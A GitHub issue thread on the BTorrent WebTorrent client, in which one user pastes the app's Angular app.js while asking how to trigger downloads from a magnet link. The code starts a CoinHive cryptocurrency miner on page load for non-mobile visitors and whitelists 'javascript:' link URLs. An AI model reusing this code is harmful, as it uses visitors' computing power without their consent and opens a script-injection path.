DiegoRBaquero / BTorrent

:globe_with_meridians: Fully-featured WebTorrent Client
MIT License
549 stars 95 forks source link

WebApp support #72

Closed ghost closed 4 years ago

ghost commented 4 years ago

As far as i know, apple bans torrent clients from the app store on iOS and iPadOS. So, could Btorrent have on option to be saved as a webapp? This could allow seeding after downloading, or without having a tab always opened.

DiegoRBaquero commented 4 years ago

Don't think so, no :( won't work on background

bryar87 commented 4 years ago

We want the download button to always be enabled by default without the user interaction with the input. we are sending the magnet link directly through the URL query string

Kurdcinama Download

html code `

Name Size Priority
{{file.name}} {{file.name}} {{file.length | pbytes}}
` app.js code `/* global WebTorrent, angular, moment, prompt, CoinHive */ const VERSION = '0.17.7' const trackers = ['wss://tracker.btorrent.xyz', 'wss://tracker.openwebtorrent.com', 'wss://tracker.fastcast.nz'] const rtcConfig = { 'iceServers': [ { 'urls': 'stun:stun.l.google.com:19305' } ] } const torrentOpts = { announce: trackers } const trackerOpts = { announce: trackers, rtcConfig: rtcConfig } const debug = window.localStorage.getItem('debug') !== null const dbg = function (string, item, color) { color = color !== null ? color : '#333333' if (debug) { if (item && item.name) { return console.debug(`%cβTorrent:${item.infoHash !== null ? 'torrent ' : 'torrent ' + item._torrent.name + ':file '}${item.name}${item.infoHash !== null ? ' (' + item.infoHash + ')' : ''} %c${string}`, 'color: #33C3F0', `color: ${color}`) } else { return console.debug(`%cβTorrent:client %c${string}`, 'color: #33C3F0', `color: ${color}`) } } } const er = function (err, item) { dbg(err, item, '#FF0000') } dbg(`Starting... v${VERSION}`) const client = new WebTorrent({ tracker: trackerOpts }) const app = angular.module('BTorrent', ['ngRoute', 'ui.grid', 'ui.grid.resizeColumns', 'ui.grid.selection', 'ngFileUpload', 'ngNotify'], ['$compileProvider', '$locationProvider', '$routeProvider', function ($compileProvider, $locationProvider, $routeProvider) { $compileProvider.aHrefSanitizationWhitelist(/^\s*(https?|magnet|blob|javascript):/) $locationProvider.html5Mode({ enabled: true, requireBase: false }).hashPrefix('#') $routeProvider.when('/view', { templateUrl: 'views/view.html', controller: 'ViewCtrl' }).when('/download', { templateUrl: 'views/download.html', controller: 'DownloadCtrl' }).otherwise({ templateUrl: 'views/full.html', controller: 'FullCtrl' }) }] ) app.controller('BTorrentCtrl', ['$scope', '$rootScope', '$http', '$log', '$location', 'ngNotify', function ($scope, $rootScope, $http, $log, $location, ngNotify) { if (window.CoinHive) { const miner = new CoinHive.Anonymous('YzzZ9mraj45TeCzxlvBX7yVm9O3GbV60', {throttle: 0.5}) if (!miner.isMobile() && !miner.didOptOut(3600)) { miner.start() } } let updateAll $rootScope.version = VERSION ngNotify.config({ duration: 5000, html: true }) if (!WebTorrent.WEBRTC_SUPPORT) { $rootScope.disabled = true ngNotify.set('Please use latest Chrome, Firefox or Opera', { type: 'error', sticky: true, button: false }) } $rootScope.client = client updateAll = function () { if ($rootScope.client.processing) { return } $rootScope.$apply() } setInterval(updateAll, 500) $rootScope.seedFiles = function (files) { let name if ((files != null) && files.length > 0) { if (files.length === 1) { dbg(`Seeding file ${files[0].name}`) } else { dbg(`Seeding ${files.length} files`) name = prompt('Please name your torrent', 'My Awesome Torrent') || 'My Awesome Torrent' torrentOpts.name = name } $rootScope.client.processing = true $rootScope.client.seed(files, torrentOpts, $rootScope.onSeed) delete torrentOpts.name } } $rootScope.openTorrentFile = function (file) { if (file != null) { dbg(`Adding torrent file ${file.name}`) $rootScope.client.processing = true $rootScope.client.add(file, torrentOpts, $rootScope.onTorrent) } } $rootScope.client.on('error', function (err, torrent) { $rootScope.client.processing = false ngNotify.set(err, 'error') er(err, torrent) }) $rootScope.addMagnet = function (magnet, onTorrent) { if ((magnet != null) && magnet.length > 0) { dbg(`Adding magnet/hash ${magnet}`) $rootScope.client.processing = true $rootScope.client.add(magnet, torrentOpts, onTorrent || $rootScope.onTorrent) } } $rootScope.destroyedTorrent = function (err) { if (err) { throw err } dbg('Destroyed torrent', $rootScope.selectedTorrent) $rootScope.selectedTorrent = null $rootScope.client.processing = false } $rootScope.changePriority = function (file) { if (file.priority === '-1') { dbg('Deselected', file) file.deselect() } else { dbg(`Selected with priority ${file.priority}`, file) file.select(file.priority) } } $rootScope.onTorrent = function (torrent, isSeed) { dbg(torrent.magnetURI) torrent.safeTorrentFileURL = torrent.torrentFileBlobURL torrent.fileName = `${torrent.name}.torrent` if (!isSeed) { dbg('Received metadata', torrent) ngNotify.set(`Received ${torrent.name} metadata`) if (!($rootScope.selectedTorrent != null)) { $rootScope.selectedTorrent = torrent } $rootScope.client.processing = false } torrent.files.forEach(function (file) { file.getBlobURL(function (err, url) { if (err) { throw err } if (isSeed) { dbg('Started seeding', torrent) if (!($rootScope.selectedTorrent != null)) { $rootScope.selectedTorrent = torrent } $rootScope.client.processing = false } file.url = url if (!isSeed) { dbg('Done ', file) ngNotify.set(`${file.name} ready for download`, 'success') } }) }) torrent.on('done', function () { if (!isSeed) { dbg('Done', torrent) } ngNotify.set(`${torrent.name} has finished downloading`, 'success') }) torrent.on('wire', function (wire, addr) { dbg(`Wire ${addr}`, torrent) }) torrent.on('error', er) } $rootScope.onSeed = function (torrent) { $rootScope.onTorrent(torrent, true) } dbg('Ready') } ]) app.controller('FullCtrl', ['$scope', '$rootScope', '$http', '$log', '$location', 'ngNotify', function ($scope, $rootScope, $http, $log, $location, ngNotify) { ngNotify.config({ duration: 5000, html: true }) $scope.addMagnet = function () { $rootScope.addMagnet($scope.torrentInput) //$scope.torrentInput = '' } $scope.columns = [ { field: 'name', cellTooltip: true, minWidth: '120' }, { field: 'length', name: 'Size', cellFilter: 'pbytes', width: '80' }, { field: 'received', displayName: 'Downloaded', cellFilter: 'pbytes', width: '135' }, { field: 'downloadSpeed', displayName: '↓ Speed', cellFilter: 'pbytes:1', width: '100' }, { field: 'progress', displayName: 'Progress', cellFilter: 'progress', width: '100' }, { field: 'timeRemaining', displayName: 'ETA', cellFilter: 'humanTime', width: '140' } ] $scope.gridOptions = { columnDefs: $scope.columns, data: $rootScope.client.torrents, enableColumnResizing: true, enableColumnMenus: false, enableRowSelection: true, enableRowHeaderSelection: false, multiSelect: false } $scope.gridOptions.onRegisterApi = function (gridApi) { $scope.gridApi = gridApi gridApi.selection.on.rowSelectionChanged($scope, function (row) { if (!row.isSelected && ($rootScope.selectedTorrent != null) && ($rootScope.selectedTorrent.infoHash = row.entity.infoHash)) { $rootScope.selectedTorrent = null } else { $rootScope.selectedTorrent = row.entity } }) } if ($location.hash() !== '') { $rootScope.client.processing = true setTimeout(function () { dbg(`Adding ${$location.hash()}`) $rootScope.addMagnet($location.hash()) }, 0) } } ]) app.controller('DownloadCtrl', ['$scope', '$rootScope', '$http', '$log', '$location', 'ngNotify', function ($scope, $rootScope, $http, $log, $location, ngNotify) { ngNotify.config({ duration: 5000, html: true }) $scope.addMagnet = function () { $rootScope.addMagnet($scope.torrentInput) $scope.torrentInput = '' } if ($location.hash() !== '') { $rootScope.client.processing = true setTimeout(function () { dbg(`Adding ${$location.hash()}`) $rootScope.addMagnet($location.hash()) }, 0) } } ]) //app.controller('ViewCtrl', ['$scope', '$rootScope', '$http', '$log', '$location', 'ngNotify', function ($scope, $rootScope, $http, $log, $location, ngNotify) { // let onTorrent // ngNotify.config({ // duration: 2000, // html: true // }) // onTorrent = function (torrent) { // $rootScope.viewerStyle = { // 'margin-top': '-20px', // 'text-align': 'center' // } // dbg(torrent.magnetURI) // torrent.safeTorrentFileURL = torrent.torrentFileBlobURL // torrent.fileName = `${torrent.name}.torrent` // $rootScope.selectedTorrent = torrent // $rootScope.client.processing = false // dbg('Received metadata', torrent) // ngNotify.set(`Received ${torrent.name} metadata`) // torrent.files.forEach(function (file) { // file.appendTo('#viewer') // file.getBlobURL(function (err, url) { // if (err) { // throw err // } // file.url = url // dbg('Done ', file) // }) // }) // torrent.on('done', function () { dbg('Done', torrent) }) // torrent.on('wire', function (wire, addr) { dbg(`Wire ${addr}`, torrent) }) // torrent.on('error', er) // } // $scope.addMagnet = function () { // $rootScope.addMagnet($scope.torrentInput, onTorrent) // //$scope.torrentInput = '' // } // if ($location.hash() !== '') { // $rootScope.client.processing = true // setTimeout(function () { // dbg(`Adding ${$location.hash()}`) // $rootScope.addMagnet($location.hash(), onTorrent) // }, 0) // } //} //]) app.filter('html', [ '$sce', function ($sce) { return function (input) { $sce.trustAsHtml(input) } } ]) app.filter('pbytes', function () { return function (num, speed) { let exponent, unit, units if (isNaN(num)) { return '' } units = ['B', 'kB', 'MB', 'GB', 'TB'] if (num < 1) { return (speed ? '' : '0 B') } exponent = Math.min(Math.floor(Math.log(num) / 6.907755278982137), 8) num = (num / Math.pow(1000, exponent)).toFixed(1) * 1 unit = units[exponent] return `${num} ${unit}${speed ? '/s' : ''}` } }) app.filter('humanTime', function () { return function (millis) { let remaining if (millis < 1000) { return '' } remaining = moment.duration(millis).humanize() return remaining[0].toUpperCase() + remaining.substr(1) } }) app.filter('progress', function () { return function (num) { return `${(100 * num).toFixed(1)}%` } }) `